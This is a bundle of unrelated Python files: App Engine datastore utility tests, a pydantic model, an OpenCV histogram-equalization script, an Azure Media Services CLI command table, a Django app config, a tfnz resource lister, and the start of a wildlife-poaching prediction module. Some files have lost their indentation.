entity_1 = FooModel(name='foo', age=15, married=False)
entity_1.put()
pb_1 = ext_db.get_protobuf_from_entity(entity_1)
entity_1 = ext_db.get_entity_from_protobuf(pb_1)
self.assertEqual(isinstance(entity_1, FooModel), True)
self.assertEqual(entity_1.name, 'foo')
self.assertEqual(entity_1.age, 15)
self.assertEqual(entity_1.married, False)
def test_many_models_to_and_from_protobuf(self):
entity_1 = FooModel(name='foo', age=15, married=False)
entity_1.put()
entity_2 = FooModel(name='bar', age=30, married=True)
entity_2.put()
entity_3 = FooModel(name='baz', age=45, married=False)
entity_3.put()
pbs = ext_db.get_protobuf_from_entity([entity_1, entity_2, entity_3])
self.assertEqual(len(pbs), 3)
entity_1, entity_2, entity_3 = ext_db.get_entity_from_protobuf(pbs)
self.assertEqual(isinstance(entity_1, FooModel), True)
self.assertEqual(entity_1.name, 'foo')
self.assertEqual(entity_1.age, 15)
self.assertEqual(entity_1.married, False)
self.assertEqual(isinstance(entity_2, FooModel), True)
self.assertEqual(entity_2.name, 'bar')
self.assertEqual(entity_2.age, 30)
self.assertEqual(entity_2.married, True)
self.assertEqual(isinstance(entity_3, FooModel), True)
self.assertEqual(entity_3.name, 'baz')
self.assertEqual(entity_3.age, 45)
self.assertEqual(entity_3.married, False)
def test_get_protobuf_from_entity_using_dict(self):
entity_1 = FooModel(name='foo', age=15, married=False)
entity_1.put()
entity_2 = FooModel(name='bar', age=30, married=True)
entity_2.put()
entity_3 = FooModel(name='baz', age=45, married=False)
entity_3.put()
entity_dict = {'entity_1': entity_1, 'entity_2': entity_2, 'entity_3': entity_3,}
pbs = ext_db.get_protobuf_from_entity(entity_dict)
entities = ext_db.get_entity_from_protobuf(pbs)
entity_1 = entities['entity_1']
entity_2 = entities['entity_2']
entity_3 = entities['entity_3']
self.assertEqual(isinstance(entity_1, FooModel), True)
self.assertEqual(entity_1.name, 'foo')
self.assertEqual(entity_1.age, 15)
self.assertEqual(entity_1.married, False)
self.assertEqual(isinstance(entity_2, FooModel), True)
self.assertEqual(entity_2.name, 'bar')
self.assertEqual(entity_2.age, 30)
self.assertEqual(entity_2.married, True)
self.assertEqual(isinstance(entity_3, FooModel), True)
self.assertEqual(entity_3.name, 'baz')
self.assertEqual(entity_3.age, 45)
self.assertEqual(entity_3.married, False)
def test_get_or_insert_with_flag(self):
entity, flag = ext_db.get_or_insert_with_flag(FooModel, 'foo', name='foo', age=15, married=False)
self.assertEqual(flag, True)
self.assertEqual(entity.name, 'foo')
self.assertEqual(entity.age, 15)
self.assertEqual(entity.married, False)
entity, flag = ext_db.get_or_insert_with_flag(FooModel, 'foo', name='bar', age=30, married=True)
self.assertEqual(flag, False)
self.assertEqual(entity.name, 'foo')
self.assertEqual(entity.age, 15)
self.assertEqual(entity.married, False)
def test_get_reference_key(self):
entity_1 = FooModel(name='foo', age=15, married=False)
entity_1.put()
entity_1_key = str(entity_1.key())
entity_2 = BarModel(key_name='first_bar', foo=entity_1)
entity_2.put()
entity_1.delete()
entity_3 = BarModel.get_by_key_name('first_bar')
# Won't resolve, but we can still get the key value.
self.assertRaises(db.Error, getattr, entity_3, 'foo')
self.assertEqual(str(ext_db.get_reference_key(entity_3, 'foo')), entity_1_key)
def test_get_reference_key_2(self):
# Set a book entity with an author reference.
class Author(db.Model):
name = db.StringProperty()
class Book(db.Model):
title = db.StringProperty()
author = db.ReferenceProperty(Author)
author = Author(name='Stephen King')
author.put()
book = Book(key_name='the-shining', title='The Shining', author=author)
book.put()
# Now let's fetch the book and get the author key without fetching it.
fetched_book = Book.get_by_key_name('the-shining')
self.assertEqual(str(ext_db.get_reference_key(fetched_book, 'author')), str(author.key()))
#===========================================================================
# db.populate_entity
#===========================================================================
def test_populate_entity(self):
entity_1 = FooModel(name='foo', age=15, married=False)
entity_1.put()
self.assertEqual(entity_1.name, 'foo')
self.assertEqual(entity_1.age, 15)
self.assertEqual(entity_1.married, False)
ext_db.populate_entity(entity_1, name='bar', age=20, married=True, city='Yukon')
entity_1.put()
self.assertEqual(entity_1.name, 'bar')
self.assertEqual(entity_1.age, 20)
self.assertEqual(entity_1.married, True)
def test_populate_entity_2(self):
entity_1 = FooModel(name='foo', age=15, married=False)
entity_1.put()
self.assertEqual(entity_1.name, 'foo')
self.assertEqual(entity_1.age, 15)
self.assertEqual(entity_1.married, False)
ext_db.populate_entity(entity_1, name='bar', age=20, married=True, city='Yukon')
entity_1.put()
self.assertRaises(AttributeError, getattr, entity_1, 'city')
def test_populate_expando_entity(self):
entity_1 = FooExpandoModel(name='foo', age=15, married=False)
entity_1.put()
self.assertEqual(entity_1.name, 'foo')
self.assertEqual(entity_1.age, 15)
self.assertEqual(entity_1.married, False)
ext_db.populate_entity(entity_1, name='bar', age=20, married=True, city='Yukon')
entity_1.put()
self.assertEqual(entity_1.name, 'bar')
self.assertEqual(entity_1.age, 20)
self.assertEqual(entity_1.married, True)
def test_populate_expando_entity_2(self):
entity_1 = FooExpandoModel(name='foo', age=15, married=False)
entity_1.put()
self.assertEqual(entity_1.name, 'foo')
self.assertEqual(entity_1.age, 15)
self.assertEqual(entity_1.married, False)
ext_db.populate_entity(entity_1, name='bar', age=20, married=True, city='Yukon')
entity_1.put()
self.assertRaises(AttributeError, getattr, entity_1, 'city')
#===========================================================================
# db.get_entity_dict
#===========================================================================
def test_get_entity_dict(self):
class MyModel(db.Model):
animal = db.StringProperty()
species = db.IntegerProperty()
description = db.TextProperty()
entity = MyModel(animal='duck', species=12,
description='A duck, a bird that swims well.')
values = ext_db.get_entity_dict(entity)
self.assertEqual(values, {
'animal': 'duck',
'species': 12,
'description': 'A duck, a bird that swims well.',
})
def test_get_entity_dict_multiple(self):
class MyModel(db.Model):
animal = db.StringProperty()
species = db.IntegerProperty()
description = db.TextProperty()
entity = MyModel(animal='duck', species=12,
description='A duck, a bird that swims well.')
entity2 = MyModel(animal='bird', species=7,
description='A bird, an animal that flies well.')
values = ext_db.get_entity_dict([entity, entity2])
self.assertEqual(values, [
{
'animal': 'duck',
'species': 12,
'description': 'A duck, a bird that swims well.',
},
{
'animal': 'bird',
'species': 7,
'description': 'A bird, an animal that flies well.',
}
])
def test_get_entity_dict_with_expando(self):
class MyModel(db.Expando):
animal = db.StringProperty()
species = db.IntegerProperty()
description = db.TextProperty()
entity = MyModel(animal='duck', species=12,
description='A duck, a bird that swims well.',
most_famous='Daffy Duck')
values = ext_db.get_entity_dict(entity)
self.assertEqual(values, {
'animal': 'duck',
'species': 12,
'description': 'A duck, a bird that swims well.',
'most_famous': 'Daffy Duck',
})
#===========================================================================
# get..._or_404
#===========================================================================
def test_get_by_key_name_or_404(self):
entity_1 = FooModel(key_name='foo', name='foo', age=15, married=False)
entity_1.put()
entity = ext_db.get_by_key_name_or_404(FooModel, 'foo')
self.assertEqual(str(entity.key()), str(entity_1.key()))
def test_get_by_key_name_or_404_2(self):
self.assertRaises(NotFound, ext_db.get_by_key_name_or_404, FooModel, 'bar')
def test_get_by_id_or_404(self):
entity_1 = FooModel(name='foo', age=15, married=False)
entity_1.put()
entity = ext_db.get_by_id_or_404(FooModel, entity_1.key().id())
self.assertEqual(str(entity.key()), str(entity_1.key()))
def test_get_by_id_or_404_2(self):
self.assertRaises(NotFound, ext_db.get_by_id_or_404, FooModel, -1)
def test_get_or_404(self):
entity_1 = FooModel(name='foo', age=15, married=False)
entity_1.put()
entity = ext_db.get_or_404(entity_1.key())
self.assertEqual(str(entity.key()), str(entity_1.key()))
def test_get_or_404_2(self):
self.assertRaises(NotFound, ext_db.get_or_404, db.Key.from_path('FooModel', 'bar'))
def test_get_or_404_3(self):
self.assertRaises(NotFound, ext_db.get_or_404, 'this, not a valid key')
#===========================================================================
# db.Property
#===========================================================================
def test_pickle_property(self):
data_1 = {'foo': 'bar'}
entity_1 = FooModel(key_name='foo', name='foo', data=data_1)
entity_1.put()
data_2 = [1, 2, 3, 'baz']
entity_2 = FooModel(key_name='bar', name='bar', data=data_2)
entity_2.put()
entity_1 = FooModel.get_by_key_name('foo')
self.assertEqual(entity_1.data, data_1)
entity_2 = FooModel.get_by_key_name('bar')
self.assertEqual(entity_2.data, data_2)
def test_slug_property(self):
entity_1 = FooModel(key_name='foo', name=u'Mary Björk')
entity_1.put()
entity_2 = FooModel(key_name='bar', name=u'Tião Macalé')
entity_2.put()
entity_1 = FooModel.get_by_key_name('foo')
entity_2 = FooModel.get_by_key_name('bar')
self.assertEqual(entity_1.slug, 'mary-bjork')
self.assertEqual(entity_2.slug, 'tiao-macale')
def test_slug_property2(self):
entity_1 = FooModel(key_name='foo', name=u'---')
entity_1.put()
entity_2 = FooModel(key_name='bar', name=u'___')
entity_2.put()
entity_1 = FooModel.get_by_key_name('foo')
entity_2 = FooModel.get_by_key_name('bar')
self.assertEqual(entity_1.slug, None)
self.assertEqual(entity_2.slug, None)
def test_slug_property3(self):
entity_1 = FooModel(key_name='foo', name=u'---', name2=u'---')
entity_1.put()
entity_2 = FooModel(key_name='bar', name=u'___', name2=u'___')
entity_2.put()
entity_1 = FooModel.get_by_key_name('foo')
entity_2 = FooModel.get_by_key_name('bar')
self.assertEqual(entity_1.slug2, 'some-default-value')
self.assertEqual(entity_2.slug2, 'some-default-value')
def test_slug_property4(self):
entity_1 = FooModel(key_name='foo', name=u'---', name2=u'Some really very big and maybe enormous string')
entity_1.put()
entity_2 = FooModel(key_name='bar', name=u'___', name2=u'abcdefghijklmnopqrstuwxyz')
entity_2.put()
entity_1 = FooModel.get_by_key_name('foo')
entity_2 = FooModel.get_by_key_name('bar')
self.assertEqual(entity_1.slug2, 'some-really-very-big')
self.assertEqual(entity_2.slug2, 'abcdefghijklmnopqrst')
def test_etag_property(self):
entity_1 = FooModel(key_name='foo', name=u'Mary Björk')
entity_1.put()
entity_2 = FooModel(key_name='bar', name=u'Tião Macalé')
entity_2.put()
entity_1 = FooModel.get_by_key_name('foo')
entity_2 = FooModel.get_by_key_name('bar')
self.assertEqual(entity_1.etag, hashlib.sha1(entity_1.name.encode('utf8')).hexdigest())
self.assertEqual(entity_2.etag, hashlib.sha1(entity_2.name.encode('utf8')).hexdigest())
def test_etag_property2(self):
entity_1 = FooModel(key_name='foo', name=u'Mary Björk')
entity_1.put()
entity_2 = FooModel(key_name='bar', name=u'Tião Macalé')
entity_2.put()
entity_1 = FooModel.get_by_key_name('foo')
entity_2 = FooModel.get_by_key_name('bar')
self.assertEqual(entity_1.etag2, None)
self.assertEqual(entity_2.etag2, None)
def test_json_property(self):
entity_1 = JsonModel(key_name='foo', data={'foo': 'bar'})
entity_1.put()
entity_1 = JsonModel.get_by_key_name('foo')
self.assertEqual(entity_1.data, {'foo': 'bar'})
def test_json_property2(self):
self.assertRaises(db.BadValueError, JsonModel, key_name='foo', data='foo')
def test_timezone_property(self):
zone = 'America/Chicago'
entity_1 = TimezoneModel(key_name='foo', data=zone)
entity_1.put()
entity_1 = TimezoneModel.get_by_key_name('foo')
self.assertEqual(entity_1.data, ext_db.pytz.timezone(zone))
def test_timezone_property2(self):
self.assertRaises(db.BadValueError, TimezoneModel, key_name='foo', data=[])
def test_timezone_property3(self):
self.assertRaises(ext_db.pytz.UnknownTimeZoneError, TimezoneModel, key_name='foo', data='foo')
def test_key_property(self):
key = db.Key.from_path('Bar', 'bar-key')
entity_1 = FooModel(name='foo', key_name='foo', somekey=key)
entity_1.put()
entity_1 = FooModel.get_by_key_name('foo')
self.assertEqual(entity_1.somekey, key)
def test_key_property2(self):
key = db.Key.from_path('Bar', 'bar-key')
entity_1 = FooModel(name='foo', key_name='foo', somekey=str(key))
entity_1.put()
entity_1 = FooModel.get_by_key_name('foo')
self.assertEqual(entity_1.somekey, key)
def test_key_property3(self):
key = db.Key.from_path('Bar', 'bar-key')
entity_1 = FooModel(name='foo', key_name='foo', somekey=str(key))
entity_1.put()
entity_2 = FooModel(name='bar', key_name='bar', somekey=entity_1)
entity_2.put()
entity_2 = FooModel.get_by_key_name('bar')
self.assertEqual(entity_2.somekey, entity_1.key())
def test_key_property4(self):
key = db.Key.from_path('Bar', 'bar-key')
entity_1 = FooModel(name='foo', somekey=str(key))
self.assertRaises(db.BadValueError, FooModel, name='bar', key_name='bar', somekey=entity_1)
def test_key_property5(self):
self.assertRaises(TypeError, FooModel, name='foo', key_name='foo', somekey=['foo'])
def test_key_property6(self):
self.assertRaises(datastore_errors.BadKeyError, FooModel, name='foo', key_name='foo', somekey='foo')
#===========================================================================
# @db.retry_on_timeout
#===========================================================================
def test_retry_on_timeout_1(self):
counter = [0]
test_timeout_1(counter=counter)
self.assertEqual(counter[0], 3)
def test_retry_on_timeout_2(self):
counter = [0]
self.assertRaises(ValueError, test_timeout_2, counter=counter)
self.assertEqual(counter[0], 5)
def test_retry_on_timeout_3(self):
counter = [0]
self.assertRaises(db.Timeout, test_timeout_3, counter=counter)
self.assertEqual(counter[0], 3)
#===========================================================================
# @db.load_entity
#===========================================================================
def test_load_entity_with_key(self):
@ext_db.load_entity(FooModel, 'foo_key', 'foo', 'key')
def get(*args, **kwargs):
return kwargs['foo']
foo = FooModel(name='foo')
foo.put()
loaded_foo = get(foo_key=str(foo.key()))
self.assertEqual(str(loaded_foo.key()), str(foo.key()))
self.assertEqual(get(foo_key=None), None)
def test_load_entity_with_key_2(self):
@ext_db.load_entity(FooModel, 'foo_key', 'foo', 'key')
def get(*args, **kwargs):
return kwargs['foo']
self.assertRaises(NotFound, get, foo_key=str(db.Key.from_path('FooModel', 'bar')))
def test_load_entity_with_id(self):
@ext_db.load_entity(FooModel, 'foo_id', 'foo', 'id')
def get(*args, **kwargs):
return kwargs['foo']
foo = FooModel(name='foo')
foo.put()
loaded_foo = get(foo_id=foo.key().id())
self.assertEqual(str(loaded_foo.key()), str(foo.key()))
def test_load_entity_with_id_2(self):
@ext_db.load_entity(FooModel, 'foo_id', 'foo', 'id')
def get(*args, **kwargs):
return kwargs['foo']
self.assertRaises(NotFound, get, foo_id=-1)
def test_load_entity_with_key_name(self):
@ext_db.load_entity(FooModel, 'foo_key_name', 'foo', 'key_name')
def get(*args, **kwargs):
return kwargs['foo']
foo = FooModel(key_name='foo', name='foo')
foo.put()
loaded_foo = get(foo_key_name='foo')
self.assertEqual(str(loaded_foo.key()), str(foo.key()))
def test_load_entity_with_key_name_2(self):
@ext_db.load_entity(FooModel, 'foo_key_name', 'foo', 'key_name')
def get(*args, **kwargs):
return kwargs['foo']
self.assertRaises(NotFound, get, foo_key_name='bar')
def test_load_entity_with_key_with_guessed_fetch_mode(self):
@ext_db.load_entity(FooModel, 'foo_key')
def get(*args, **kwargs):
return kwargs['foo']
foo = FooModel(name='foo')
foo.put()
loaded_foo = get(foo_key=str(foo.key()))
self.assertEqual(str(loaded_foo.key()), str(foo.key()))
self.assertEqual(get(foo_key=None), None)
def test_load_entity_with_key_with_impossible_fetch_mode(self):
def test():
@ext_db.load_entity(FooModel, 'foo_bar')
def get(*args, **kwargs):
return kwargs['foo']
self.assertRaises(NotImplementedError, test)
#===========================================================================
# db.run_in_namespace
#===========================================================================
def test_run_in_namespace(self):
class MyModel(db.Model):
name = db.StringProperty()
def create_entity(name):
entity = MyModel(key_name=name, name=name)
entity.put()
def get_entity(name):
return MyModel.get_by_key_name(name)
entity = ext_db.run_in_namespace('ns1', get_entity, 'foo')
self.assertEqual(entity, None)
ext_db.run_in_namespace('ns1', create_entity, 'foo')
entity = ext_db.run_in_namespace('ns1', get_entity, 'foo')
self.assertNotEqual(entity, None)
entity = ext_db.run_in_namespace('ns2', get_entity, 'foo')
self.assertEqual(entity, None)
#===========================================================================
# db.to_key
#===========================================================================
def test_to_key(self):
class MyModel(db.Model):
pass
# None.
self.assertEqual(ext_db.to_key(None), None)
# Model without key.
self.assertEqual(ext_db.to_key(MyModel()), None)
# Model with key.
self.assertEqual(ext_db.to_key(MyModel(key_name='foo')), db.Key.from_path('MyModel', 'foo'))
# Key.
self.assertEqual(ext_db.to_key(db.Key.from_path('MyModel', 'foo')), db.Key.from_path('MyModel', 'foo'))
# Key as string.
self.assertEqual(ext_db.to_key(str(db.Key.from_path('MyModel', 'foo'))), db.Key.from_path('MyModel', 'foo'))
# All mixed.
keys = [None, MyModel(), MyModel(key_name='foo'), db.Key.from_path('MyModel', 'foo'), str(db.Key.from_path('MyModel', 'foo'))]
result = [None, None, db.Key.from_path('MyModel', 'foo'), db.Key.from_path('MyModel', 'foo'), db.Key.from_path('MyModel', 'foo')]
self.assertEqual(ext_db.to_key(keys), result)
self.assertRaises(datastore_errors.BadArgumentError, ext_db.to_key, {})
if __name__ == '__main__':
test_utils.main()
|
from typing import Optional
from pydantic import BaseModel
class Query(BaseModel):
shop_url: str
api_secret: str
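if __name__ == "__main__":
    # Illustrative check with placeholder values
    query = Query(shop_url="https://example.myshopify.com", api_secret="not-a-real-secret")
    print(query.dict())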
|
import numpy as np
import cv2
from matplotlib import pyplot as plt
cap = cv2.VideoCapture('Night Drive - 2689.mp4')
count = 0
while cap.isOpened():
    ret, frame = cap.read()
    if not ret:
        break
    count += 1
    # skip ahead: only process from the 100th frame onward
    if count < 100:
        continue
    plt.imshow(cv2.cvtColor(frame, cv2.COLOR_BGR2RGB))
    plt.show()
    # equalize the brightness (V) channel in HSV space to lift the dark frame
    H, S, V = cv2.split(cv2.cvtColor(frame, cv2.COLOR_BGR2HSV))
    eq_V = cv2.equalizeHist(V)
    eq_hsv = cv2.merge([H, S, eq_V])
    eq_image = cv2.cvtColor(eq_hsv, cv2.COLOR_HSV2RGB)
    plt.imshow(eq_image)
    plt.show()
    #cv2.waitKey(0);
    #cv2.destroyAllWindows()
    break
cap.release()
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from azure.cli.core.commands import CliCommandType
from ._client_factory import (get_mediaservices_client, get_transforms_client,
get_assets_client, get_jobs_client, get_streaming_locators_client,
get_streaming_policies_client, get_streaming_endpoints_client,
get_locations_client, get_live_events_client, get_live_outputs_client,
get_content_key_policies_client, get_asset_filters_client,
get_account_filters_client)
from ._exception_handler import ams_exception_handler
# pylint: disable=line-too-long
def load_command_table(self, _): # pylint: disable=too-many-locals, too-many-statements
def get_sdk(operation, client_factory):
return CliCommandType(
operations_tmpl='azure.mgmt.media.operations#{}Operations.'.format(operation) + '{}',
client_factory=client_factory,
exception_handler=ams_exception_handler
)
def get_custom_sdk(custom_module, client_factory):
return CliCommandType(
operations_tmpl='azure.cli.command_modules.ams.operations.{}#'.format(custom_module) + '{}',
client_factory=client_factory,
exception_handler=ams_exception_handler
)
with self.command_group('ams account', get_sdk('Mediaservices', get_mediaservices_client)) as g:
g.custom_command('show', 'get_mediaservice',
custom_command_type=get_custom_sdk('account', get_mediaservices_client))
g.command('delete', 'delete')
g.generic_update_command('update',
getter_name='mediaservice_update_getter',
getter_type=get_custom_sdk('account', get_mediaservices_client),
custom_func_name='update_mediaservice',
custom_func_type=get_custom_sdk('account', get_mediaservices_client))
g.custom_command('list', 'list_mediaservices',
custom_command_type=get_custom_sdk('account', get_mediaservices_client))
g.custom_command('create', 'create_mediaservice',
custom_command_type=get_custom_sdk('account', get_mediaservices_client))
g.custom_command('check-name', 'check_name_availability',
custom_command_type=get_custom_sdk('account', get_locations_client))
with self.command_group('ams account storage', get_sdk('Mediaservices', get_mediaservices_client)) as g:
g.custom_command('add', 'add_mediaservice_secondary_storage',
custom_command_type=get_custom_sdk('account', get_mediaservices_client))
g.custom_command('remove', 'remove_mediaservice_secondary_storage',
custom_command_type=get_custom_sdk('account', get_mediaservices_client))
g.command('sync-storage-keys', 'sync_storage_keys')
with self.command_group('ams account sp', get_sdk('Mediaservices', get_mediaservices_client)) as g:
g.custom_command('create', 'create_assign_sp_to_mediaservice',
custom_command_type=get_custom_sdk('sp', get_mediaservices_client))
g.custom_command('reset-credentials', 'reset_sp_credentials_for_mediaservice',
custom_command_type=get_custom_sdk('sp', get_mediaservices_client))
with self.command_group('ams account mru', get_sdk('Mediaservices', get_mediaservices_client)) as g:
g.custom_command('show', 'get_mru',
custom_command_type=get_custom_sdk('mru', None))
g.custom_command('set', 'set_mru',
custom_command_type=get_custom_sdk('mru', None))
with self.command_group('ams transform', get_sdk('Transforms', get_transforms_client)) as g:
g.show_command('show', 'get')
g.command('list', 'list')
g.command('delete', 'delete')
g.custom_command('create', 'create_transform',
custom_command_type=get_custom_sdk('transform', get_transforms_client))
g.generic_update_command('update',
setter_name='transform_update_setter',
setter_type=get_custom_sdk('transform', get_mediaservices_client),
custom_func_name='update_transform',
custom_func_type=get_custom_sdk('transform', get_mediaservices_client))
with self.command_group('ams transform output', get_sdk('Transforms', get_mediaservices_client)) as g:
g.custom_command('add', 'add_transform_output',
custom_command_type=get_custom_sdk('transform', get_transforms_client))
g.custom_command('remove', 'remove_transform_output',
custom_command_type=get_custom_sdk('transform', get_transforms_client))
with self.command_group('ams asset', get_sdk('Assets', get_assets_client)) as g:
g.show_command('show', 'get')
g.command('list', 'list')
g.command('delete', 'delete')
g.command('list-streaming-locators', 'list_streaming_locators')
g.custom_command('get-encryption-key', 'get_encryption_key',
custom_command_type=get_custom_sdk('asset', get_assets_client))
g.generic_update_command('update',
custom_func_name='update_asset',
custom_func_type=get_custom_sdk('asset', get_mediaservices_client))
g.custom_command('get-sas-urls', 'get_sas_urls',
custom_command_type=get_custom_sdk('asset', get_assets_client))
g.custom_command('create', 'create_asset',
custom_command_type=get_custom_sdk('asset', get_assets_client))
with self.command_group('ams asset-filter', get_sdk('AssetFilters', get_asset_filters_client)) as g:
g.command('list', 'list')
g.show_command('show', 'get')
g.command('delete', 'delete')
g.custom_command('create', 'create_asset_filter',
custom_command_type=get_custom_sdk('asset_filter', get_asset_filters_client))
g.generic_update_command('update',
custom_func_name='update_asset_filter',
custom_func_type=get_custom_sdk('asset_filter', get_mediaservices_client))
with self.command_group('ams job', get_sdk('Jobs', get_jobs_client)) as g:
g.show_command('show', 'get')
g.command('list', 'list')
g.command('delete', 'delete')
g.custom_command('cancel', 'cancel_job',
custom_command_type=get_custom_sdk('job', get_jobs_client))
g.custom_command('start', 'create_job',
custom_command_type=get_custom_sdk('job', get_jobs_client))
g.generic_update_command('update',
setter_name='update',
custom_func_name='update_job',
custom_func_type=get_custom_sdk('job', get_jobs_client))
with self.command_group('ams content-key-policy', get_sdk('ContentKeyPolicies', get_content_key_policies_client)) as g:
g.custom_command('create', 'create_content_key_policy',
custom_command_type=get_custom_sdk('content_key_policy', get_content_key_policies_client))
g.custom_command('show', 'show_content_key_policy',
custom_command_type=get_custom_sdk('content_key_policy', get_content_key_policies_client))
g.command('delete', 'delete')
g.command('list', 'list')
g.generic_update_command('update',
getter_name='get_policy_properties_with_secrets',
setter_name='update_content_key_policy_setter',
setter_type=get_custom_sdk('content_key_policy', get_content_key_policies_client),
custom_func_name='update_content_key_policy',
custom_func_type=get_custom_sdk('content_key_policy', get_content_key_policies_client))
with self.command_group('ams content-key-policy option', get_sdk('ContentKeyPolicies', get_content_key_policies_client)) as g:
g.custom_command('add', 'add_content_key_policy_option',
custom_command_type=get_custom_sdk('content_key_policy', get_content_key_policies_client))
g.custom_command('remove', 'remove_content_key_policy_option',
custom_command_type=get_custom_sdk('content_key_policy', get_content_key_policies_client))
g.custom_command('update', 'update_content_key_policy_option',
custom_command_type=get_custom_sdk('content_key_policy', get_content_key_policies_client))
with self.command_group('ams streaming-locator', get_sdk('StreamingLocators', get_streaming_locators_client)) as g:
g.custom_command('create', 'create_streaming_locator',
custom_command_type=get_custom_sdk('streaming_locator', get_streaming_locators_client))
g.command('list', 'list')
g.show_command('show', 'get')
g.command('delete', 'delete')
g.command('get-paths', 'list_paths')
g.custom_command('list-content-keys', 'list_content_keys',
custom_command_type=get_custom_sdk('streaming_locator', get_streaming_locators_client))
with self.command_group('ams streaming-policy', get_sdk('StreamingPolicies', get_streaming_policies_client)) as g:
g.custom_command('create', 'create_streaming_policy',
custom_command_type=get_custom_sdk('streaming_policy', get_streaming_policies_client))
g.command('list', 'list')
g.show_command('show', 'get')
g.command('delete', 'delete')
with self.command_group('ams streaming-endpoint', get_sdk('StreamingEndpoints', get_streaming_endpoints_client)) as g:
g.command('list', 'list')
g.custom_command('start', 'start',
custom_command_type=get_custom_sdk('streaming_endpoint', get_streaming_endpoints_client),
supports_no_wait=True)
g.custom_command('stop', 'stop',
custom_command_type=get_custom_sdk('streaming_endpoint', get_streaming_endpoints_client),
supports_no_wait=True)
g.custom_command('create', 'create_streaming_endpoint',
custom_command_type=get_custom_sdk('streaming_endpoint', get_streaming_endpoints_client),
supports_no_wait=True)
g.generic_update_command('update',
setter_name='update_streaming_endpoint_setter',
setter_type=get_custom_sdk('streaming_endpoint', get_streaming_endpoints_client),
custom_func_name='update_streaming_endpoint',
custom_func_type=get_custom_sdk('streaming_endpoint', get_streaming_endpoints_client),
supports_no_wait=True)
g.show_command('show', 'get')
g.command('delete', 'delete')
g.command('scale', 'scale')
g.wait_command('wait')
with self.command_group('ams streaming-endpoint akamai', get_sdk('StreamingEndpoints', get_streaming_endpoints_client)) as g:
g.custom_command('add', 'add_akamai_access_control',
custom_command_type=get_custom_sdk('streaming_endpoint', get_streaming_endpoints_client))
g.custom_command('remove', 'remove_akamai_access_control',
custom_command_type=get_custom_sdk('streaming_endpoint', get_streaming_endpoints_client))
with self.command_group('ams live-event', get_sdk('LiveEvents', get_live_events_client)) as g:
g.custom_command('create', 'create',
custom_command_type=get_custom_sdk('live_event', get_live_events_client),
supports_no_wait=True)
g.custom_command('start', 'start',
custom_command_type=get_custom_sdk('live_event', get_live_events_client),
supports_no_wait=True)
g.custom_command('stop', 'stop',
custom_command_type=get_custom_sdk('live_event', get_live_events_client),
supports_no_wait=True)
g.custom_command('reset', 'reset',
custom_command_type=get_custom_sdk('live_event', get_live_events_client),
supports_no_wait=True)
g.show_command('show', 'get')
g.command('delete', 'delete')
g.command('list', 'list')
g.generic_update_command('update',
setter_name='update_live_event_setter',
setter_type=get_custom_sdk('live_event', get_live_events_client),
custom_func_name='update_live_event',
custom_func_type=get_custom_sdk('live_event', get_live_events_client))
g.wait_command('wait')
with self.command_group('ams live-output', get_sdk('LiveOutputs', get_live_outputs_client)) as g:
g.custom_command('create', 'create_live_output',
custom_command_type=get_custom_sdk('live_output', get_live_outputs_client))
g.show_command('show', 'get')
g.command('list', 'list')
g.command('delete', 'delete')
with self.command_group('ams account-filter', get_sdk('AccountFilters', get_account_filters_client)) as g:
g.custom_command('create', 'create_account_filter',
custom_command_type=get_custom_sdk('account_filter', get_account_filters_client))
g.show_command('show', 'get')
g.command('list', 'list')
g.command('delete', 'delete')
g.generic_update_command('update',
custom_func_name='update_account_filter',
custom_func_type=get_custom_sdk('account_filter', get_mediaservices_client))
with self.command_group('ams', is_preview=True):
pass
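# The groups registered above surface CLI commands such as `az ams account list`,
# `az ams transform create` and `az ams streaming-endpoint start`; their argument
# definitions are registered separately from this command table.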
|
#!/usr/bin/env python
from django.apps import AppConfig
class DjangoMakeSuperUserConfig(AppConfig):
name = 'django_makesuperuser'
|
#!/usr/local/bin/python3.5
# Copyright (c) 2017 David Preece, All rights reserved.
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
import json
from base64 import b64encode
from tfnz.cli import generic_cli, base_argparse
def main():
parser = base_argparse('tfresources')
generic_cli(parser, {None: list_resources})
def list_resources(location, args):
resources = {
'location': location.location,
'nodes': {b64encode(node.pk).decode(): node.stats for node in location.nodes.values()},
'volumes': [vol.display_name() for vol in location.volumes.values()],
'externals': [xtn.display_name() for xtn in location.externals.values()],
'endpoints': [ep.domain for ep in location.endpoints.values()]
}
print(json.dumps(resources, indent=2))
if __name__ == "__main__":
main()
|
# implementation of iWare-E for PAWS
# Lily Xu
# May 2019
import sys
import time
import pickle
import pandas as pd
import numpy as np
from scipy.optimize import minimize
from sklearn import metrics
from sklearn.model_selection import train_test_split, StratifiedKFold
from sklearn.preprocessing import StandardScaler
from sklearn import tree
from sklearn.svm import LinearSVC, SVC
from sklearn.gaussian_process import GaussianProcessRegressor
# from sklearn.gaussian_process import GaussianProcessClassifier
from sklearn.ensemble import BaggingClassifier, RandomForestClassifier
from imblearn.ensemble import BalancedBaggingClassifier
from sklearn.gaussian_process.kernels import RBF
from itertools import product
from gpc import GaussianProcessClassifier
NUM_COLS_TO_SKIP = 6 # number of extraneous columns in 'x' features CSV file
POSITIVE_LABEL = 1 # how a positive label is encoded in the data
RANDOM_SEED = None  # set to an int for reproducible runs
N_JOBS = 1 # -1 to use max
# parameters for bagging classifier
NUM_ESTIMATORS = 32 #32 #50
MAX_SAMPLES = 0.8
MAX_FEATURES = .5
# verbose output if == 1
VERBOSE = 0
###########################################################
# modify GPR to serve as a classifier
# and offer variance results
###########################################################
def gpr_predict_proba(self, x, return_var=False):
mean_r, std = self.predict(x, return_std=True)
prob = 1 / (1 + np.exp(mean_r - 0.5))
prob = prob.reshape(-1, 1)
# form array with predictions for both classes
predictions = np.concatenate((prob, 1 - prob), axis=1)
